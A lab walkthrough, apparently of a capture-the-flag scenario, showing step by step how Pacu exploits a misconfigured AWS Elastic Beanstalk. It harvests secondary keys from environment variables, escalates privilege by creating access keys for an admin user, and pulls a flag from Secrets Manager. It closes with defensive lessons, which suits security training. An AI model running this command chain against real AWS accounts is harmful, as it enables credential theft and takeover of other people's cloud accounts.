(Walkthrough) Beanstalk Secrets

--- ## Exploiting Elastic Beanstalk with Pacu (Lab Walkthrough) > ⚠️ **Heads up:** Never ever paste real AWS keys in public. Seriously, don’t do it. In this lab walkthrough the keys you see are **dead, temporary, and masked** — so no worries here. Treat your _real_ keys like your toothbrush: don’t share them, don’t reuse them, and if they ever leak… replace them immediately. --- ## Creds ```bash initial_low_priv_credentials = Access Key: AKIA************ Secret Key: ******************** ``` --- ## What is Beanstalk? - It’s AWS’s “let me deploy code without crying over servers” service. - Flow: **Upload Code → AWS spins up infra → App runs.** - Very handy. Also, very abusable if misconfigured. 👉 [Full Blog on Pentesting Beanstalk w/ Pacu](https://rhinosecuritylabs.com/tools/new-pacu-module-enumerating-elastic-beanstalk/) --- ## Add Credentials ```bash $ aws configure --profile beanstalk AWS Access Key ID [None]: AKIA************ AWS Secret Access Key [None]: ******************** Default region name [None]: us-east-1 Default output format [None]: json ``` --- ## Check the user ```bash $ aws sts get-caller-identity --profile beanstalk { "UserId": "AIDA5CBDQ6MGBRDA2DRUL", "Account": "123456789012", "Arn": "arn:aws:iam::123456789012:user/cgidd21ksoxwkz_low_priv_user" } ``` --- ## Fire up Pacu ```bash $ pacu # ... Choose an option: 0 What would you like to name this new session? beanstalk Session beanstalk created. ``` ASCII art included because hacking without ASCII art just feels wrong. --- ## Import Keys ```bash Pacu (beanstalk:No Keys Set) > import_keys beanstalk Imported keys as "imported-beanstalk" ``` --- ## Search for Beanstalk Module ```bash Pacu (beanstalk:imported-beanstalk) > search beanstalk ``` Output: ``` [Category: ENUM] Enumerates Elastic Beanstalk applications, environments, checks for secrets. elasticbeanstalk__enum ``` --- ## Learn more about the module ```bash Pacu (beanstalk:imported-beanstalk) > help elasticbeanstalk__enum ``` You’ll see usage flags for enumerating apps, envs, configs, tags, or downloading source code. --- ## Run it on our region ```bash Pacu (beanstalk:imported-beanstalk) > run elasticbeanstalk__enum --region us-east-1 ``` Sample output (trimmed for sanity): ``` [elasticbeanstalk__enum] 1 application(s) found in us-east-1. [elasticbeanstalk__enum] 1 environment(s) found in us-east-1. Potential secret in environment variable: SSHSourceRestriction => tcp,22,22,0.0.0.0/0 Potential secret in environment variable: EnvironmentVariables => SECONDARY_SECRET_KEY=********************,SECONDARY_ACCESS_KEY=AKIA************ ``` --- ## Secondary Keys Discovered ```bash SECONDARY_ACCESS_KEY=AKIA************ SECONDARY_SECRET_KEY=******************** ``` --- ## Configure and enumerate them ```bash $ aws configure --profile b-creds-2 AWS Access Key ID [None]: AKIA************ AWS Secret Access Key [None]: ******************** Default region name [None]: us-east-1 Default output format [None]: json ``` Check the user: ```bash $ aws sts get-caller-identity --profile b-creds-2 { "UserId": "AIDA5CBDQ6MGHWTK5DRPT", "Account": "123456789012", "Arn": "arn:aws:iam::123456789012:user/cgidd21ksoxwkz_secondary_user" } ``` --- ## Import into Pacu ```bash Pacu (beanstalk:imported-beanstalk) > import_keys b-creds-2 Imported keys as "imported-b-creds-2" ``` --- ## Enumerate IAM permissions ```bash Pacu (beanstalk:imported-b-creds-2) > run iam__enum_permissions ``` You’ll get a breakdown of permissions, with some confirmed and a bunch of unconfirmed. Check details: ```bash Pacu (beanstalk:imported-b-creds-2) > whoami ``` Output shows the user, attached policy, and allowed IAM actions. --- ## Privilege Escalation Scan ```bash Pacu (beanstalk:imported-b-creds-2) > run iam__privesc_scan --scan-only ``` Output example: ``` [iam__privesc_scan] Escalation methods for current user: [iam__privesc_scan] POTENTIAL: AttachUserPolicy [iam__privesc_scan] CONFIRMED: CreateAccessKey ``` --- ## Elevate Privileges ```bash Pacu (beanstalk:imported-b-creds-2) > run iam__privesc_scan --user-methods CreateAccessKey ``` Output (masked): ``` [iam__backdoor_users_keys] cgidd21ksoxwkz_admin_user [iam__backdoor_users_keys] Access Key ID: AKIA************ [iam__backdoor_users_keys] Secret Key: ******************** ``` --- ## Configure Admin Profile ```bash $ aws configure --profile admin-bean AWS Access Key ID [None]: AKIA************ AWS Secret Access Key [None]: ******************** Default region name [None]: us-east-1 Default output format [None]: json ``` --- ## Import into Pacu ```bash Pacu (beanstalk:imported-b-creds-2) > import_keys admin-bean Imported keys as "imported-admin-bean" ``` --- ## Secrets Manager Enumeration ```bash Pacu (beanstalk:imported-admin-bean) > run secrets__enum --region us-east-1 ``` Output: ``` [secrets__enum] Found secret: cgidd21ksoxwkz_final_flag ``` --- ## Grab the Flag ```bash $ cd ~/.local/share/pacu/beanstalk/downloads/secrets/secrets_manager/ $ cat secrets.txt cgidd21ksoxwkz_final_flag:FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!} ``` --- # Wrap-Up - Beanstalk is easy to use… and easy to misconfigure. - Environment variables are **not** a safe place for secrets. - Pacu makes enumeration and escalation super straightforward in labs. - This walkthrough shows why **least privilege, secret managers, and monitoring** are non-negotiable in AWS.